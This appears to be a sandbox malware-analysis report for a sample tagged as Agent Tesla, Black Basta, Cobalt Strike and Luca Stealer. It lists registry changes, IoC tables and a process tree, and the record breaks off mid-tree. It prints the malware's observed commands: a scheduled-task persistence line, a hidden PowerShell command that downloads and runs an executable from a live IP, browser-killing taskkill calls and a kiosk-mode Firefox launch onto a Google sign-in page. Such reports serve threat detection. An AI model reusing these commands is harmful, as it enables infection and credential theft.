Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\06B55B94726C2574FA40E2F795DBA41E	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\PackageName = "25de640391.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10494760271\\"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A8C11C0912DAE7E4DBAFDBC927A40678	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\PackageCode = "CEFEBEF251D3D34458A6CE4F5E1D0E42"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\06B55B94726C2574FA40E2F795DBA41E\A8C11C0912DAE7E4DBAFDBC927A40678	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Media\1 = ";"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Net	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\10494760271\\"	msiexec.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3688	schtasks.exe

Suspicious behavior: EnumeratesProcesses 59 IoCs

pid	Process
3636	powershell.exe
3636	powershell.exe
5068	TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE
5068	TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE
1320	rapes.exe
1320	rapes.exe
4676	MSBuild.exe
4676	MSBuild.exe
4676	MSBuild.exe
4676	MSBuild.exe
716	60692a6a88.exe
716	60692a6a88.exe
716	60692a6a88.exe
716	60692a6a88.exe
716	60692a6a88.exe
716	60692a6a88.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
716	msiexec.exe
716	msiexec.exe
5928	rapes.exe
5928	rapes.exe
5332	MSBuild.exe
5332	MSBuild.exe
5332	MSBuild.exe
5332	MSBuild.exe
5532	MSBuild.exe
5532	MSBuild.exe
5532	MSBuild.exe
5532	MSBuild.exe
1016	qhjMWht.exe
1016	qhjMWht.exe
1016	qhjMWht.exe
1016	qhjMWht.exe
1016	qhjMWht.exe
1016	qhjMWht.exe
2868	6a92a7a526.exe
2868	6a92a7a526.exe
4128	powershell.exe
4128	powershell.exe
4128	powershell.exe
13040	rapes.exe
13040	rapes.exe
13244	ibC8xs1.exe
13244	ibC8xs1.exe
13244	ibC8xs1.exe
13244	ibC8xs1.exe
13244	ibC8xs1.exe
13244	ibC8xs1.exe
6524	exp.exe
6524	exp.exe
7088	MSBuild.exe
7088	MSBuild.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe
6664	e2fdaeb4.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
5832	UZPt0hR.exe
5832	UZPt0hR.exe
5832	UZPt0hR.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3636	powershell.exe
Token: SeDebugPrivilege	2388	taskkill.exe
Token: SeDebugPrivilege	1012	taskkill.exe
Token: SeDebugPrivilege	4660	taskkill.exe
Token: SeDebugPrivilege	1124	taskkill.exe
Token: SeDebugPrivilege	4452	taskkill.exe
Token: SeShutdownPrivilege	1124	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1124	msiexec.exe
Token: SeSecurityPrivilege	716	msiexec.exe
Token: SeCreateTokenPrivilege	1124	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1124	msiexec.exe
Token: SeLockMemoryPrivilege	1124	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1124	msiexec.exe
Token: SeMachineAccountPrivilege	1124	msiexec.exe
Token: SeTcbPrivilege	1124	msiexec.exe
Token: SeSecurityPrivilege	1124	msiexec.exe
Token: SeTakeOwnershipPrivilege	1124	msiexec.exe
Token: SeLoadDriverPrivilege	1124	msiexec.exe
Token: SeSystemProfilePrivilege	1124	msiexec.exe
Token: SeSystemtimePrivilege	1124	msiexec.exe
Token: SeProfSingleProcessPrivilege	1124	msiexec.exe
Token: SeIncBasePriorityPrivilege	1124	msiexec.exe
Token: SeCreatePagefilePrivilege	1124	msiexec.exe
Token: SeCreatePermanentPrivilege	1124	msiexec.exe
Token: SeBackupPrivilege	1124	msiexec.exe
Token: SeRestorePrivilege	1124	msiexec.exe
Token: SeShutdownPrivilege	1124	msiexec.exe
Token: SeDebugPrivilege	1124	msiexec.exe
Token: SeAuditPrivilege	1124	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1124	msiexec.exe
Token: SeChangeNotifyPrivilege	1124	msiexec.exe
Token: SeRemoteShutdownPrivilege	1124	msiexec.exe
Token: SeUndockPrivilege	1124	msiexec.exe
Token: SeSyncAgentPrivilege	1124	msiexec.exe
Token: SeEnableDelegationPrivilege	1124	msiexec.exe
Token: SeManageVolumePrivilege	1124	msiexec.exe
Token: SeImpersonatePrivilege	1124	msiexec.exe
Token: SeCreateGlobalPrivilege	1124	msiexec.exe
Token: SeRestorePrivilege	716	msiexec.exe
Token: SeTakeOwnershipPrivilege	716	msiexec.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeRestorePrivilege	716	msiexec.exe
Token: SeTakeOwnershipPrivilege	716	msiexec.exe
Token: SeRestorePrivilege	716	msiexec.exe
Token: SeTakeOwnershipPrivilege	716	msiexec.exe
Token: SeRestorePrivilege	716	msiexec.exe
Token: SeTakeOwnershipPrivilege	716	msiexec.exe
Token: SeRestorePrivilege	716	msiexec.exe
Token: SeTakeOwnershipPrivilege	716	msiexec.exe
Token: SeRestorePrivilege	716	msiexec.exe
Token: SeTakeOwnershipPrivilege	716	msiexec.exe
Token: SeRestorePrivilege	716	msiexec.exe
Token: SeTakeOwnershipPrivilege	716	msiexec.exe
Token: SeRestorePrivilege	716	msiexec.exe
Token: SeTakeOwnershipPrivilege	716	msiexec.exe
Token: SeRestorePrivilege	716	msiexec.exe
Token: SeTakeOwnershipPrivilege	716	msiexec.exe
Token: SeRestorePrivilege	716	msiexec.exe
Token: SeTakeOwnershipPrivilege	716	msiexec.exe
Token: SeRestorePrivilege	716	msiexec.exe
Token: SeTakeOwnershipPrivilege	716	msiexec.exe
Token: SeRestorePrivilege	716	msiexec.exe
Token: SeTakeOwnershipPrivilege	716	msiexec.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
1800	2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1800	2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1800	2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5068	TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4048	firefox.exe
4564	6b65999cd8.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4048	firefox.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
1800	2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1800	2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1800	2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe
4564	6b65999cd8.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4048	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1800 wrote to memory of 5084	1800	2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 1800 wrote to memory of 5084	1800	2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 1800 wrote to memory of 5084	1800	2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 1800 wrote to memory of 1844	1800	2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1800 wrote to memory of 1844	1800	2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1800 wrote to memory of 1844	1800	2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 5084 wrote to memory of 3688	5084	cmd.exe	89
PID 5084 wrote to memory of 3688	5084	cmd.exe	89
PID 5084 wrote to memory of 3688	5084	cmd.exe	89
PID 1844 wrote to memory of 3636	1844	mshta.exe	91
PID 1844 wrote to memory of 3636	1844	mshta.exe	91
PID 1844 wrote to memory of 3636	1844	mshta.exe	91
PID 3636 wrote to memory of 5068	3636	powershell.exe	102
PID 3636 wrote to memory of 5068	3636	powershell.exe	102
PID 3636 wrote to memory of 5068	3636	powershell.exe	102
PID 5068 wrote to memory of 1320	5068	TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE	104
PID 5068 wrote to memory of 1320	5068	TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE	104
PID 5068 wrote to memory of 1320	5068	TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE	104
PID 1320 wrote to memory of 2304	1320	rapes.exe	107
PID 1320 wrote to memory of 2304	1320	rapes.exe	107
PID 2304 wrote to memory of 3040	2304	31W3sid.exe	108
PID 2304 wrote to memory of 3040	2304	31W3sid.exe	108
PID 2304 wrote to memory of 3040	2304	31W3sid.exe	108
PID 2304 wrote to memory of 3588	2304	31W3sid.exe	109
PID 2304 wrote to memory of 3588	2304	31W3sid.exe	109
PID 2304 wrote to memory of 3588	2304	31W3sid.exe	109
PID 2304 wrote to memory of 3588	2304	31W3sid.exe	109
PID 2304 wrote to memory of 3588	2304	31W3sid.exe	109
PID 2304 wrote to memory of 3588	2304	31W3sid.exe	109
PID 1320 wrote to memory of 1208	1320	rapes.exe	110
PID 1320 wrote to memory of 1208	1320	rapes.exe	110
PID 1208 wrote to memory of 4676	1208	NlmvJyQ.exe	111
PID 1208 wrote to memory of 4676	1208	NlmvJyQ.exe	111
PID 1208 wrote to memory of 4676	1208	NlmvJyQ.exe	111
PID 1208 wrote to memory of 4676	1208	NlmvJyQ.exe	111
PID 1208 wrote to memory of 4676	1208	NlmvJyQ.exe	111
PID 1208 wrote to memory of 4676	1208	NlmvJyQ.exe	111
PID 1208 wrote to memory of 4676	1208	NlmvJyQ.exe	111
PID 1208 wrote to memory of 4676	1208	NlmvJyQ.exe	111
PID 1208 wrote to memory of 4676	1208	NlmvJyQ.exe	111
PID 1320 wrote to memory of 716	1320	rapes.exe	112
PID 1320 wrote to memory of 716	1320	rapes.exe	112
PID 1320 wrote to memory of 716	1320	rapes.exe	112
PID 1320 wrote to memory of 1136	1320	rapes.exe	114
PID 1320 wrote to memory of 1136	1320	rapes.exe	114
PID 1320 wrote to memory of 4564	1320	rapes.exe	116
PID 1320 wrote to memory of 4564	1320	rapes.exe	116
PID 1320 wrote to memory of 4564	1320	rapes.exe	116
PID 4564 wrote to memory of 2388	4564	6b65999cd8.exe	117
PID 4564 wrote to memory of 2388	4564	6b65999cd8.exe	117
PID 4564 wrote to memory of 2388	4564	6b65999cd8.exe	117
PID 4564 wrote to memory of 1012	4564	6b65999cd8.exe	121
PID 4564 wrote to memory of 1012	4564	6b65999cd8.exe	121
PID 4564 wrote to memory of 1012	4564	6b65999cd8.exe	121
PID 4564 wrote to memory of 4660	4564	6b65999cd8.exe	123
PID 4564 wrote to memory of 4660	4564	6b65999cd8.exe	123
PID 4564 wrote to memory of 4660	4564	6b65999cd8.exe	123
PID 4564 wrote to memory of 1124	4564	6b65999cd8.exe	125
PID 4564 wrote to memory of 1124	4564	6b65999cd8.exe	125
PID 4564 wrote to memory of 1124	4564	6b65999cd8.exe	125
PID 4564 wrote to memory of 4452	4564	6b65999cd8.exe	127
PID 4564 wrote to memory of 4452	4564	6b65999cd8.exe	127
PID 4564 wrote to memory of 4452	4564	6b65999cd8.exe	127
PID 4564 wrote to memory of 2976	4564	6b65999cd8.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-07_bd4e8ee0fbfcb3a79fac670043fca8ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn 4g0BQmaytkG /tr "mshta C:\Users\Admin\AppData\Local\Temp\xckzgfeyE.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5084
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn 4g0BQmaytkG /tr "mshta C:\Users\Admin\AppData\Local\Temp\xckzgfeyE.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3688
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\xckzgfeyE.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1844
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3636
  - - C:\Users\Admin\AppData\Local\TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE
      "C:\Users\Admin\AppData\Local\TempZQ9DGCD2VPW489FDHXEM1QIIMKISUNNF.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:5068
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1320
      - C:\Users\Admin\AppData\Local\Temp\10493560101\31W3sid.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10493560101\31W3sid.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2304
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:3040
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Checks SCSI registry key(s)
        
        PID:3588
      - C:\Users\Admin\AppData\Local\Temp\10494280101\NlmvJyQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494280101\NlmvJyQ.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1208
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4676
      - C:\Users\Admin\AppData\Local\Temp\10494730101\60692a6a88.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494730101\60692a6a88.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:716
      - C:\Users\Admin\AppData\Local\Temp\10494740101\de50cd8cf1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494740101\de50cd8cf1.exe"
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        
        PID:1136
      - C:\Users\Admin\AppData\Local\Temp\10494750101\6b65999cd8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494750101\6b65999cd8.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:4564
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2388
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1012
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4660
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1124
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4452
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:2976
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4048
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {f94145f3-4015-4f71-9d90-facebc7770c4} -parentPid 4048 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4048" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:3192
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27135 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2520 -initialChannelId {2bf052fc-4a62-48ce-b9c6-f00c096826f2} -parentPid 4048 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4048" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:1652
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3856 -prefsLen 25164 -prefMapHandle 3860 -prefMapSize 270279 -jsInitHandle 3864 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3872 -initialChannelId {9ad6097f-1315-45d3-bfe0-fba2d945cbb7} -parentPid 4048 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4048" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        Checks processor information in registry
        
        PID:4036
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4044 -prefsLen 27276 -prefMapHandle 4048 -prefMapSize 270279 -ipcHandle 4124 -initialChannelId {3a1631f5-93a4-4542-8c09-2712c8f81f8f} -parentPid 4048 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4048" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:4280
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4468 -prefsLen 34775 -prefMapHandle 4472 -prefMapSize 270279 -jsInitHandle 4476 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3240 -initialChannelId {dd9b4023-4186-4df9-ab83-19c0f9a2e417} -parentPid 4048 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4048" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        Checks processor information in registry
        
        PID:3636
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5196 -prefsLen 35012 -prefMapHandle 5180 -prefMapSize 270279 -ipcHandle 5176 -initialChannelId {02c94730-dc0c-4785-9c0c-479e995f7407} -parentPid 4048 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4048" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        9⤵
        Checks processor information in registry
        
        PID:2276
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5444 -prefsLen 32952 -prefMapHandle 5568 -prefMapSize 270279 -jsInitHandle 5556 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5524 -initialChannelId {b41cf8ef-70e1-44e8-be84-8c2886640685} -parentPid 4048 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4048" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        9⤵
        Checks processor information in registry
        
        PID:5416
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5572 -prefsLen 32952 -prefMapHandle 5772 -prefMapSize 270279 -jsInitHandle 5776 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5720 -initialChannelId {79cf05dc-ce49-4153-b3ed-e6505cb1d4f1} -parentPid 4048 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4048" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        9⤵
        Checks processor information in registry
        
        PID:5492
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5792 -prefsLen 32952 -prefMapHandle 5796 -prefMapSize 270279 -jsInitHandle 5800 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5712 -initialChannelId {060e16fe-dfdb-47b1-b4cf-7c4e885b03a5} -parentPid 4048 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4048" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        9⤵
        Checks processor information in registry
        
        PID:5520
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10494760271\25de640391.msi" /quiet
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1124
      - C:\Users\Admin\AppData\Local\Temp\10494770101\1cbb3f6a9a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494770101\1cbb3f6a9a.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5880
      - C:\Users\Admin\AppData\Local\Temp\10494780101\3d57c52eef.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494780101\3d57c52eef.exe"
        6⤵
        Executes dropped EXE
        
        PID:3828
      - C:\Users\Admin\AppData\Local\Temp\10494790101\NlmvJyQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494790101\NlmvJyQ.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5272
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
